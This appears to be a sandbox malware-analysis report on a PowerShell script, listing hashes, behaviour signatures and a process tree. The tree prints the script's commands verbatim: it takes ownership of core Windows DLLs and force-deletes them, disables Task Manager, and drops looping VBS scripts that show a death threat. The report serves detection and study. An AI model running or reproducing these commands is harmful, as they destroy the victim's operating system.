c6a55bb360c44bc4bc2ad2c0658c2bfd941e0bb987688dd9178c47059aa8b472

Analysis

max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
15/07/2024, 16:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

run.ps1
Size

2KB
MD5

c9cf4a8860f21ea2c8fd79b8e527a06b
SHA1

385bd7877eba66e3ed43350227707b2b97c0effc
SHA256

c6a55bb360c44bc4bc2ad2c0658c2bfd941e0bb987688dd9178c47059aa8b472
SHA512

561f2494d87d56b9a3883f3afeb93c3e228367c6629deef2fa884dedf62cf0e7b15e8e2d2f1537fdcd3e84200244172e2c5fb36d779b278f256cf66019dd6fd3

Score

8^/10

discovery evasion execution exploit

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Possible privilege escalation attempt 22 IoCs

exploit

pid	Process
3024	icacls.exe
2544	takeown.exe
2924	icacls.exe
2896	takeown.exe
2900	takeown.exe
2572	icacls.exe
2640	takeown.exe
2152	icacls.exe
2864	takeown.exe
2708	icacls.exe
2140	icacls.exe
2580	takeown.exe
2448	icacls.exe
2648	icacls.exe
2560	icacls.exe
2824	icacls.exe
2944	takeown.exe
2608	icacls.exe
2724	takeown.exe
2344	takeown.exe
2392	takeown.exe
2828	takeown.exe

Modifies file permissions 1 TTPs 22 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2152	icacls.exe
2944	takeown.exe
2724	takeown.exe
2900	takeown.exe
2708	icacls.exe
2140	icacls.exe
2344	takeown.exe
2924	icacls.exe
2392	takeown.exe
2824	icacls.exe
2864	takeown.exe
3024	icacls.exe
2640	takeown.exe
2896	takeown.exe
2560	icacls.exe
2580	takeown.exe
2572	icacls.exe
2544	takeown.exe
2448	icacls.exe
2648	icacls.exe
2828	takeown.exe
2608	icacls.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\die.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe
File opened for modification	C:\Windows\loop.vbs	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2300	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2628	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2300	powershell.exe
296	chrome.exe
296	chrome.exe
5016	chrome.exe
5016	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeTakeOwnershipPrivilege	2344	takeown.exe
Token: SeTakeOwnershipPrivilege	2640	takeown.exe
Token: SeTakeOwnershipPrivilege	2896	takeown.exe
Token: SeTakeOwnershipPrivilege	2392	takeown.exe
Token: SeTakeOwnershipPrivilege	2828	takeown.exe
Token: SeTakeOwnershipPrivilege	2944	takeown.exe
Token: SeTakeOwnershipPrivilege	2900	takeown.exe
Token: SeTakeOwnershipPrivilege	2864	takeown.exe
Token: SeTakeOwnershipPrivilege	2580	takeown.exe
Token: SeTakeOwnershipPrivilege	2724	takeown.exe
Token: SeTakeOwnershipPrivilege	2544	takeown.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	296	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe
Token: SeShutdownPrivilege	5016	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
296	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe
5016	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2300 wrote to memory of 2324	2300	powershell.exe	31
PID 2300 wrote to memory of 2324	2300	powershell.exe	31
PID 2300 wrote to memory of 2324	2300	powershell.exe	31
PID 2324 wrote to memory of 2344	2324	cmd.exe	32
PID 2324 wrote to memory of 2344	2324	cmd.exe	32
PID 2324 wrote to memory of 2344	2324	cmd.exe	32
PID 2324 wrote to memory of 2924	2324	cmd.exe	102
PID 2324 wrote to memory of 2924	2324	cmd.exe	102
PID 2324 wrote to memory of 2924	2324	cmd.exe	102
PID 2300 wrote to memory of 2520	2300	powershell.exe	34
PID 2300 wrote to memory of 2520	2300	powershell.exe	34
PID 2300 wrote to memory of 2520	2300	powershell.exe	34
PID 2520 wrote to memory of 2640	2520	cmd.exe	35
PID 2520 wrote to memory of 2640	2520	cmd.exe	35
PID 2520 wrote to memory of 2640	2520	cmd.exe	35
PID 2520 wrote to memory of 2448	2520	cmd.exe	36
PID 2520 wrote to memory of 2448	2520	cmd.exe	36
PID 2520 wrote to memory of 2448	2520	cmd.exe	36
PID 2300 wrote to memory of 3056	2300	powershell.exe	100
PID 2300 wrote to memory of 3056	2300	powershell.exe	100
PID 2300 wrote to memory of 3056	2300	powershell.exe	100
PID 3056 wrote to memory of 2896	3056	cmd.exe	38
PID 3056 wrote to memory of 2896	3056	cmd.exe	38
PID 3056 wrote to memory of 2896	3056	cmd.exe	38
PID 3056 wrote to memory of 2648	3056	cmd.exe	39
PID 3056 wrote to memory of 2648	3056	cmd.exe	39
PID 3056 wrote to memory of 2648	3056	cmd.exe	39
PID 2300 wrote to memory of 2272	2300	powershell.exe	40
PID 2300 wrote to memory of 2272	2300	powershell.exe	40
PID 2300 wrote to memory of 2272	2300	powershell.exe	40
PID 2272 wrote to memory of 2392	2272	cmd.exe	41
PID 2272 wrote to memory of 2392	2272	cmd.exe	41
PID 2272 wrote to memory of 2392	2272	cmd.exe	41
PID 2272 wrote to memory of 2152	2272	cmd.exe	42
PID 2272 wrote to memory of 2152	2272	cmd.exe	42
PID 2272 wrote to memory of 2152	2272	cmd.exe	42
PID 2300 wrote to memory of 2688	2300	powershell.exe	43
PID 2300 wrote to memory of 2688	2300	powershell.exe	43
PID 2300 wrote to memory of 2688	2300	powershell.exe	43
PID 2688 wrote to memory of 2828	2688	cmd.exe	44
PID 2688 wrote to memory of 2828	2688	cmd.exe	44
PID 2688 wrote to memory of 2828	2688	cmd.exe	44
PID 2688 wrote to memory of 2824	2688	cmd.exe	45
PID 2688 wrote to memory of 2824	2688	cmd.exe	45
PID 2688 wrote to memory of 2824	2688	cmd.exe	45
PID 2300 wrote to memory of 2872	2300	powershell.exe	46
PID 2300 wrote to memory of 2872	2300	powershell.exe	46
PID 2300 wrote to memory of 2872	2300	powershell.exe	46
PID 2872 wrote to memory of 2944	2872	cmd.exe	47
PID 2872 wrote to memory of 2944	2872	cmd.exe	47
PID 2872 wrote to memory of 2944	2872	cmd.exe	47
PID 2872 wrote to memory of 2708	2872	cmd.exe	48
PID 2872 wrote to memory of 2708	2872	cmd.exe	48
PID 2872 wrote to memory of 2708	2872	cmd.exe	48
PID 2300 wrote to memory of 2868	2300	powershell.exe	49
PID 2300 wrote to memory of 2868	2300	powershell.exe	49
PID 2300 wrote to memory of 2868	2300	powershell.exe	49
PID 2868 wrote to memory of 2900	2868	cmd.exe	50
PID 2868 wrote to memory of 2900	2868	cmd.exe	50
PID 2868 wrote to memory of 2900	2868	cmd.exe	50
PID 2868 wrote to memory of 2560	2868	cmd.exe	51
PID 2868 wrote to memory of 2560	2868	cmd.exe	51
PID 2868 wrote to memory of 2560	2868	cmd.exe	51
PID 2300 wrote to memory of 2808	2300	powershell.exe	52

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\run.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2300
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\hal.dll && icacls C:\Windows\System32\hal.dll /grant Everyone:(F) && del/f C:\Windows\System32\hal.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\hal.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2344
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\hal.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2924
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\user32.dll && icacls C:\Windows\System32\user32.dll /grant Everyone:(F) && del/f C:\Windows\System32\user32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2520
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\user32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2640
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\user32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2448
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\kernel32.dll && icacls C:\Windows\System32\kernel32.dll /grant Everyone:(F) && del/f C:\Windows\System32\kernel32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3056
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\kernel32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2896
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\kernel32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2648
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\gdi32.dll && icacls C:\Windows\System32\gdi32.dll /grant Everyone:(F) && del/f C:\Windows\System32\gdi32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2272
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\gdi32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2392
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\gdi32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2152
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\advapi32.dll && icacls C:\Windows\System32\advapi32.dll /grant Everyone:(F) && del/f C:\Windows\System32\advapi32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\advapi32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2828
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\advapi32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2824
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\ntdll.dll && icacls C:\Windows\System32\ntdll.dll /grant Everyone:(F) && del/f C:\Windows\System32\ntdll.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2872
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\ntdll.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2944
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\ntdll.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2708
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\shell32.dll && icacls C:\Windows\System32\shell32.dll /grant Everyone:(F) && del/f C:\Windows\System32\shell32.dll"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2868
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\shell32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2900
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\shell32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2560
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\ole32.dll && icacls C:\Windows\System32\ole32.dll /grant Everyone:(F) && del/f C:\Windows\System32\ole32.dll"
  2⤵
  PID:2808
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\ole32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2864
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\ole32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2140
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\comdlg32.dll && icacls C:\Windows\System32\comdlg32.dll /grant Everyone:(F) && del/f C:\Windows\System32\comdlg32.dll"
  2⤵
  PID:2656
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\comdlg32.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2580
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\comdlg32.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3024
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\wininet.dll && icacls C:\Windows\System32\wininet.dll /grant Everyone:(F) && del/f C:\Windows\System32\wininet.dll"
  2⤵
  PID:2732
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\wininet.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2724
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\wininet.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2608
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "takeown /f C:\Windows\System32\msvcrt.dll && icacls C:\Windows\System32\msvcrt.dll /grant Everyone:(F) && del/f C:\Windows\System32\msvcrt.dll"
  2⤵
  PID:2548
- - C:\Windows\system32\takeown.exe
    takeown /f C:\Windows\System32\msvcrt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2544
- - C:\Windows\system32\icacls.exe
    icacls C:\Windows\System32\msvcrt.dll /grant Everyone:(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2572
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"
  2⤵
  PID:2604
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:2628
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo msgbox "YOU ARE GOING TO DIE" >> %windir%\die.vbs"
  2⤵
  - Drops file in Windows directory
  PID:2680
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo set wshshell = createobject("wscript.shell") >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:3004
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo s = 1000 >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:2612
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo for i = 1 to 20 >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:2008
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo s = s - 10 >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:1852
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo wshshell.run "chrome.exe https://www.google.com/search?q=im+dead" >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:2368
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo wshshell.run "%windir%\die.vbs" >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:524
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo wscript.sleep s >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:1908
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "echo next >> %windir%\loop.vbs"
  2⤵
  - Drops file in Windows directory
  PID:2032
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "start %windir%\loop.vbs"
  2⤵
  PID:1056
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Windows\loop.vbs"
    3⤵
    PID:1496
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:296
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef1dd9758,0x7fef1dd9768,0x7fef1dd9778
        5⤵
        
        PID:644
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:2
        5⤵
        
        PID:2056
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1508 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:8
        5⤵
        
        PID:1508
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1608 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:8
        5⤵
        
        PID:1808
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2232 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:588
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2240 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:2532
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2816 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:2876
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1328 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:2
        5⤵
        
        PID:2724
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3308 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:1956
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=3564 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:2616
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=2496 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:1312
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=2788 --field-trial-handle=1236,i,9069605442297214143,18126909750298143129,131072 /prefetch:1
        5⤵
        
        PID:1016
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
